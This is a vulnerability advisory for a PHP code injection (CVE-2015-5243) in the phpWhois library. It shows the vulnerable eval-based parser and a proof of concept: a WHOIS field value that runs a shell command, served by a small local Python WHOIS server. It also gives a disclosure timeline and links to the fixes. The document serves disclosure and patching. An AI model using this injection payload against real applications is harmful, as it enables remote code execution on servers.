PHP Code Injection

phpWhois PHP Code Injection\nVulnerability Overview\nphpWhois and some of its forks in versions before 5.1.0 are prone to a\ncode injection vulnerability due to insufficient sanitization of returned\nWHOIS data. This allows attackers controlling the WHOIS information of a\nrequested domain to execute arbitrary PHP code in the context of the\napplication.\n\nIdentifier : SBA-ADV-20180425-01\nType of Vulnerability : Code Injection\nSoftware/Product Name : phpWhois\nVendor : phpwhois.org,\nabcdmitry,\njsmitty12,\nwebalternative\nand others\nAffected Versions : phpwhois.org: 4.2.2 and probably prior,\nas well as the following forks\nabcdmitry: 4.2.5 and probably prior,\njsmitty12: 5.0.2 and probably prior\nFixed in Version : jsmitty12: 5.1.0\nCVE ID : CVE-2015-5243\nCVSSv3 Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nCVSSv3 Base Score : 9.8 (Critical)\n\nVendor Description\n\nThis package contains a Whois (RFC954) library for PHP. It allows a\nPHP program to create a Whois object, and obtain the output of a\nwhois query with the lookup function.\n\nSource: https://github.com/phpWhois/phpWhois\nImpact\nBy exploiting the vulnerability documented in this advisory, an\nattacker controlling the WHOIS information of a domain retrieved via\nphpWhois can execute arbitrary PHP code in the context of the\napplication. The set of domains enabling this attack vector is limited\nto certain top-level domains. Sensitive data accessible by the\napplication might get exposed through this attack.\nThe vulnerability is fixed in version 5.1.0 or newer of jsmitty12’s fork.\nWe recommend upgrading to this version.\nVulnerability Description\nphpWhois implements multiple generic parsers for WHOIS data in\nwhois.parser.php. The parser implemented in function\ngeneric_parser_b is vulnerable to injection of PHP code.\nThe function generic_parser_b builds a PHP statement from WHOIS data\nvalues by concatenating strings without proper sanitization. It then\npasses the statement to the eval function:\nfunction generic_parser_b($rawdata, $items = array(), $dateformat = ‘mdy’, $hasreg = true, $scanall = false) {\n[…]\n foreach ($rawdata as $val) {\n if (trim($val) != ‘’) {\n if (($val[0] == ‘%’ || $val[0] == ‘#’) && $disok) {\n $r[‘disclaimer’][] = trim(substr($val, 1));\n $disok = true;\n continue;\n }\n $disok = false;\n reset($items);\n foreach ($items as $match => $field) {\n $pos = strpos($val, $match);\n if ($pos !== false) {\n if ($field != ‘’) {\n $var = ‘$r’ . getvarname($field);\n $itm = trim(substr($val, $pos + strlen($match)));\n if ($itm != ‘’)\n eval($var . ‘="’ . str_replace(‘"’, ‘\\"’, $itm) . ‘";’);\n }\n if (!$scanall)\n break;\n }\n }\n }\n[…]\n}\nAt least the following 33 top-level domain handlers make use of the\nvulnerable parser:\nae, aero, ag, asia, au, bh, biz, cat, cn, co, co.za, fi, hu, in, info, jp, lu, me, mobi, museum, name, nz, org, pro, ru, sc, se, su, tel, travel, us, ws, xxx\n\nProof-of-Concept\nAn attacker can exploit this vulnerability by setting malicious WHOIS\ninformation such as Registrant Name: ${passthru(‘id’)} for an arbitrary\n.org domain.\nInstead of a real name, we specify ${passthru(‘id’)} which PHP will\ninterpret as a variable expansion inside double quoted string literals.\nWe simulate this situation via a simple WHOIS server implementation:\nimport SocketServer\n\nDATA = "Registrant Name: ${passthru(‘id’)}\\n"\n\nclass WhoisHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n self.request.recv(1024)\n print(‘Request received’)\n self.request.sendall(DATA)\n print(‘Payload sent’)\n\nif name == ‘main’:\n SocketServer.ThreadingTCPServer.allow_reuse_address = True\n server = SocketServer.ThreadingTCPServer((‘127.0.0.1’, 9999), WhoisHandler)\n server.serve_forever()\nThe following example sets up phpWhois to use the simulated WHOIS\nserver and requests information for example.org:\nuseServer(‘org’, ‘127.0.0.1:9999’);\necho $whois->lookup(‘example.org’);\nTherefore, the vulnerable phpWhois version executes the injected PHP\nstatement passthru(‘id’) which will execute the Unix id command on the\nserver and return its output.\nTimeline\n\n2018-04-25: identification of vulnerability\n2018-04-26: initial contact of several phpWhois and fork maintainers\n2018-04-26: disclosed vulnerability to phpwhois.org project maintainer\n2018-04-27: disclosed vulnerability to jsmitty12\n2018-04-30: phpwhois.org project maintainer stated that it is a\nknown issue (CVE-2015-5243) with a fix committed at\nhttps://github.com/sparc/phpWhois.org\n2018-04-30: fix is not released yet and MITRE lists CVE-2015-5243\nas assigned but private\n2018-05-29: jsmitty12 released fixed version 5.1.0\n2018-08-01: public disclosure\n\nReferences\n\nOriginal advisory: https://blog.nettitude.com/uk/cve-2015-5243-phpwhois-remote-code-execution\nFixes:\n\nhttps://github.com/sparc/phpWhois.org/commit/5cc572490c9053d46598ec9348a11e36a5a33a46#diff-f150ae17da7341bf6c2eff928684b3a3\nhttps://github.com/Gemorroj/phpwhois/commit/91c937e03c876ba1290b6de2a3ad953d2105fdd0\nhttps://github.com/jsmitty12/phpWhois/commit/863ccf62824f9998099ed20c2952ec8953ce3d06\n\n\n\nCredits\n\nOriginal advisory by Iain Wallace (Nettitude)\nRediscovered by David Gnedt (SBA Research)\n\n